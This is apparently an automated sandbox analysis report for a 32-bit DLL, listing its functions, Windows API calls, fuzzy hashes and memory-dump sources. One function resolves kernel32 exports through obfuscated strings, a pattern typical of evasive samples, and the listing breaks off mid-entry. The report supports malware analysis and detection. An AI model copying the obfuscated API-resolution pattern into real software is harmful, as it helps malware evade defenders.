                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 350ca9f6db5dba3064255ced565cb56368c9c61ba2b6a71d8daf4c85f09b7364
                • Instruction ID: 61acf84c31470fcfc314ac724711db85dea3bd4baed3f968ba4f1c76393044d4
                • Opcode Fuzzy Hash: 350ca9f6db5dba3064255ced565cb56368c9c61ba2b6a71d8daf4c85f09b7364
                • Instruction Fuzzy Hash: 06F059319445346BEB105AB68804B6A375C9F437ACB098161EC14D61A0CB3CD48086E2
                Function 6B921000 Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 347 6b921000-6b92100e 348 6b921012-6b921019 call 6b924402 ExitProcess 347->348 349 6b921010-6b92101f 347->349
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: c0aaccb24c97c0b6e4e78997a3cd543fda10fcc56bdf7bec65950323869da43b
                • Instruction ID: 25181765ccabb753b88994d2f82c29c133a3e757ae94da95a215f95797e2db4e
                • Opcode Fuzzy Hash: c0aaccb24c97c0b6e4e78997a3cd543fda10fcc56bdf7bec65950323869da43b
                • Instruction Fuzzy Hash: 6BD02230CA9228FBCF0CABB4C406B0D73E8EF0F710F008020EA1487300C239CA00A922

                Non-executed Functions

                Function 6B93612B Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: d976abd30eb9d49bf9b6ec06300b6f49cffbdefb9cb3c9e42cc9004f95e1013d
                • Instruction ID: d05f21215c794a634dd2061b2e706e2f623c362f4078f5ff53b353693908932a
                • Opcode Fuzzy Hash: d976abd30eb9d49bf9b6ec06300b6f49cffbdefb9cb3c9e42cc9004f95e1013d
                • Instruction Fuzzy Hash: 7BD23871E082298FDB65CE28CD40BDAB7B9EB45305F1441EAD84DE7240EB79AE85CF41
                Function 6B935C80 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
                • Instruction ID: 72cb15e5ac9403e82a56f141f29b12f3bca43025b52b9abf62c9922df864bbbd
                • Opcode Fuzzy Hash: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
                • Instruction Fuzzy Hash: 70024B71E052299BDB14CFA9C880B9EFBF5FF49314F2482A9D919E7340D735AA41CB90
                Function 6B9253EE Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6B9253FA
                • IsDebuggerPresent.KERNEL32 ref: 6B9254C6
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6B9254DF
                • UnhandledExceptionFilter.KERNEL32(?), ref: 6B9254E9
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: fb5cd98ea3809de51a52a9eb30fe1909cef6125316d9b5d8cb11eeb7b52a3265
                • Instruction ID: 7b0daec18b2c7cb4155be1dec9115bdcdff20e8a9522902d6fa85c496224547a
                • Opcode Fuzzy Hash: fb5cd98ea3809de51a52a9eb30fe1909cef6125316d9b5d8cb11eeb7b52a3265
                • Instruction Fuzzy Hash: A4310775D1521C9BDF20DFA0C849BCDBBB8AF09304F1041AAE50CAB244E7749A85CF44
                Function 6B92DCFD Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,6B921775), ref: 6B92DDF5
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6B921775), ref: 6B92DDFF
                • UnhandledExceptionFilter.KERNEL32(6B92144D,?,?,?,?,?,6B921775), ref: 6B92DE0C
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 48c659a4f99ffa812259cfc15642d4d02fab605e0a4f20dbbd566754921c5c27
                • Instruction ID: 2ab8c7dcad71b63f5bc93a94c02e63098ee201b21f9150d3ee47756a6c491e5d
                • Opcode Fuzzy Hash: 48c659a4f99ffa812259cfc15642d4d02fab605e0a4f20dbbd566754921c5c27
                • Instruction Fuzzy Hash: 9231C374D5122CABCB21DF24D889B8DBBB8BF19314F5042EAE81CA7254E7749B858F44
                Function 6B93B869 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6B93B864,?,?,00000008,?,?,6B93B467,00000000), ref: 6B93BA96
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: f331f0ffcdc5d523f9a374747060ceb9eee4e469a90c020f5516c6c51b459856
                • Instruction ID: 1fb00d3bd56313ea26e057a6c5eb111f5cdf2cc0984b4e1aff8978869b7022e5
                • Opcode Fuzzy Hash: f331f0ffcdc5d523f9a374747060ceb9eee4e469a90c020f5516c6c51b459856
                • Instruction Fuzzy Hash: 21B14931610A199FD705CF28C496B557BF0FF45368F258698E8E9CF2A2C739E982CB40
                Function 6B9255EB Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                Download Yara Rule
                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6B925601
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: a7c2fabdede60367e5803024d77d547bb9d1434c2965767c2415d3a533a9d1bc
                • Instruction ID: 71a0c2ed726251f0b718330fa641dd1ae9c894433e3d7be54992491244876719
                • Opcode Fuzzy Hash: a7c2fabdede60367e5803024d77d547bb9d1434c2965767c2415d3a533a9d1bc
                • Instruction Fuzzy Hash: 83515BB1E25206DFDB04DF59C98179ABBF8FB45314F2081BAD522EB258D379D940CB50
                Function 6B9338F4 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a1c8fcf137131e0b8e7dab388f3b1f495069b49bf235c31c93e60f85a36a4d00
                • Instruction ID: 42c6dd2570f35e79b972dc8c0fc81ea312bb5d477d14164b35fbbff26580b7cf
                • Opcode Fuzzy Hash: a1c8fcf137131e0b8e7dab388f3b1f495069b49bf235c31c93e60f85a36a4d00
                • Instruction Fuzzy Hash: 834183B5C4822CAEDB24DF79CC99AAAB7B9EF45304F1442D9E419D3201D6389A848F50
                Function 6B934AF5 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: b39b4548e37b4f76c4f89ec703d4966dd431968086c3be6eba8fdb1c57b7fc6b
                • Instruction ID: c7117f073d88106efc4b848bb83f610241fb91044f0048ae1446734e1f9cdd39
                • Opcode Fuzzy Hash: b39b4548e37b4f76c4f89ec703d4966dd431968086c3be6eba8fdb1c57b7fc6b
                • Instruction Fuzzy Hash: A3A02230B0A20CEF8F20AF30830830C3EEEBF0BAC03020838E008C0220EB38C000AB00
                Function 6B92B71C Relevance: .4, Instructions: 385COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d469258a59becf634f4ea069aacd27947fbda3dba30713a4d02c287a3ca2714
                • Instruction ID: 7b839641719497cbd3ba878e71d05ed70be613e0a0f525335912a8c4e69fdccf
                • Opcode Fuzzy Hash: 3d469258a59becf634f4ea069aacd27947fbda3dba30713a4d02c287a3ca2714
                • Instruction Fuzzy Hash: BED12334E20606CFDB14CF68C480A6AB7F9FF09718F10869DD56A9B699D339E942CF41
                Function 6B92B3BD Relevance: .3, Instructions: 333COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f6dc443e58fd324b51c172f0af945689e93eb17efce0d2875b1b9d7c01c34227
                • Instruction ID: 4d3e71a0851d1c54071b2a2ea4fba9887ca1eec5f89972d65b5f68f8975d33e6
                • Opcode Fuzzy Hash: f6dc443e58fd324b51c172f0af945689e93eb17efce0d2875b1b9d7c01c34227
                • Instruction Fuzzy Hash: 01C13330D24B068FCB10CF38C5D0B6ABBF9EF06318F104699D5669B6A9D339E945CB51
                Function 6B92B07B Relevance: .3, Instructions: 318COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9b7e8f7abb09e80ae1cb32804da98c13a2cf576e290094d051885328dde05c4a
                • Instruction ID: c0fcba7dc39634ff693abb9759ec4b1ad0d2a25633bebb75855cd3446e02afdd
                • Opcode Fuzzy Hash: 9b7e8f7abb09e80ae1cb32804da98c13a2cf576e290094d051885328dde05c4a
                • Instruction Fuzzy Hash: 26B1F271D2070A8BCB14CE78C9917AEB7F9AF06308F10865DD4629769DC73DE602CB55
                Function 6B92171F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 174libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6B921765
                • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6B921887
                • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6B9217F6
                • kernel32.dll, xrefs: 6B921755
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc_strlen$HandleModule
                • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
                • API String ID: 3538810943-2765630095
                • Opcode ID: 3b23a31f3f7e6572cf457c9bc9561bd2dea6426544d9447474397c7098eaa759
                • Instruction ID: ce8c396184ce214914b993feb1510cb62cc3aec61102cc8aa7fe6226b6990d0e
                • Opcode Fuzzy Hash: 3b23a31f3f7e6572cf457c9bc9561bd2dea6426544d9447474397c7098eaa759
                • Instruction Fuzzy Hash: 8D613571C1425CDFDB20DFB8CC85AACBBB8BF1A308F244129E554A7286DB3999198F01
                Function 6B938279 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 6B937FC0: CreateFileW.KERNEL32(00000000,00000000,?,6B938322,?,?,00000000,?,6B938322,00000000,0000000C), ref: 6B937FDD
                • GetLastError.KERNEL32 ref: 6B93838D
                • __dosmaperr.LIBCMT ref: 6B938394
                • GetFileType.KERNEL32(00000000), ref: 6B9383A0
                • GetLastError.KERNEL32 ref: 6B9383AA
                • __dosmaperr.LIBCMT ref: 6B9383B3
                • CloseHandle.KERNEL32(00000000), ref: 6B9383D3
                • CloseHandle.KERNEL32(00000000), ref: 6B938520
                • GetLastError.KERNEL32 ref: 6B938552
                • __dosmaperr.LIBCMT ref: 6B938559
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: be70d08520aeb69707d408ed357f40eed79170eb9acd7def974ce815a38faae7
                • Instruction ID: 807a757ae3b42ecf445c442c00595c24f5042aef406513a77a8d3eda6ae5876d
                • Opcode Fuzzy Hash: be70d08520aeb69707d408ed357f40eed79170eb9acd7def974ce815a38faae7
                • Instruction Fuzzy Hash: 24A10432A181689FCF0D9F78DC91BAE3BB5AB07328F140199E811DB391D739D912CB51
                Function 6B926ADA Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • type_info::operator==.LIBVCRUNTIME ref: 6B926BF9
                • ___TypeMatch.LIBVCRUNTIME ref: 6B926D07
                • _UnwindNestedFrames.LIBCMT ref: 6B926E59
                • CallUnexpected.LIBVCRUNTIME ref: 6B926E74
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                • String ID: csm$csm$csm
                • API String ID: 2751267872-393685449
                • Opcode ID: 71554bfc40be0ce4108119d35eadc3893968852a605a60ae71963c1364fc7a93
                • Instruction ID: 1609b9ef8ebad49ed1ae5f069740ae30479473e5c851e240902f04d18ce7597f
                • Opcode Fuzzy Hash: 71554bfc40be0ce4108119d35eadc3893968852a605a60ae71963c1364fc7a93
                • Instruction Fuzzy Hash: 3BB1D131C20209EFCF05DFA4D88199EBBB9FF14318F104599E8146BA19D739EA61CFA1
                Function 6B93068D Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: _strrchr
                • String ID:
                • API String ID: 3213747228-0
                • Opcode ID: 5b196b74059184e9b8e0842bd6eede7b04aae286f8f0b9da0e097125ac15f892
                • Instruction ID: 1745e0d36ecd731addfa7351990f206e7d4dc897119c76bc1e8179a24bb1c4e0
                • Opcode Fuzzy Hash: 5b196b74059184e9b8e0842bd6eede7b04aae286f8f0b9da0e097125ac15f892
                • Instruction Fuzzy Hash: 6DB15632E043759FEB01CF68CC91BAE7BB9EF56714F144195E844AB282D378D901CBA1
                Function 6B926540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 6B926577
                • ___except_validate_context_record.LIBVCRUNTIME ref: 6B92657F
                • _ValidateLocalCookies.LIBCMT ref: 6B926608
                • __IsNonwritableInCurrentImage.LIBCMT ref: 6B926633
                • _ValidateLocalCookies.LIBCMT ref: 6B926688
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: 75f13b950e55ac2d2d4a510b06fcb24d9c13b4b57bbfa81878f8996787d2e4bb
                • Instruction ID: 32c6f4688cf0c9946b47b04fab55f2fcc7094833a203cec5e5039c8e534750ca
                • Opcode Fuzzy Hash: 75f13b950e55ac2d2d4a510b06fcb24d9c13b4b57bbfa81878f8996787d2e4bb
                • Instruction Fuzzy Hash: C241E934D10218EBCF10DF78C884A9EBBB9BF46318F108195D814AB799DB3DD915CB91
                Function 6B931703 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • FreeLibrary.KERNEL32(00000000,?,6B931812,6B927D84,B586E81C,00000000,6B92C75A,00000000,?,6B93198B,00000022,FlsSetValue,6B93F4F8,ccs,6B92C75A), ref: 6B9317C4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID: api-ms-$ext-ms-
                • API String ID: 3664257935-537541572
                • Opcode ID: 8807b64705054b5facbf98b6748f3a2d5ea4cccaf6c7ce84a3b57cf6f314db22
                • Instruction ID: cf46fd1af83c985b454057415f82144ee3fe95d8c18f2abe2b6394ce1e825740
                • Opcode Fuzzy Hash: 8807b64705054b5facbf98b6748f3a2d5ea4cccaf6c7ce84a3b57cf6f314db22
                • Instruction Fuzzy Hash: 9021E735E45134B7DB21AB748C80A4A37ADEF43760B280260EA17A73B4D738ED01C6D0
                Function 6B92FE17 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 74d645d8e6671a19f3d6b2e6cd53d8b8b41f5434496b9f2bb604952e40bae49b
                • Instruction ID: 1e069c1d533a690dba9f61ccdb2de54382d9f4d5b8e80b5dac59c0ac19f345ed
                • Opcode Fuzzy Hash: 74d645d8e6671a19f3d6b2e6cd53d8b8b41f5434496b9f2bb604952e40bae49b
                • Instruction Fuzzy Hash: C4B12470E08269AFDB01CFA8C891BAE7BB5BF4731CF004199E514AB391D778D941CBA1
                Function 6B9267A3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(00000001,?,6B926721,6B9251C4,6B924B74,?,6B924DAC,?,00000001,?,?,00000001,?,6B944240,0000000C,6B924EA5), ref: 6B9267B1
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6B9267BF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6B9267D8
                • SetLastError.KERNEL32(00000000,6B924DAC,?,00000001,?,?,00000001,?,6B944240,0000000C,6B924EA5,?,00000001,?), ref: 6B92682A
                Memory Dump Source
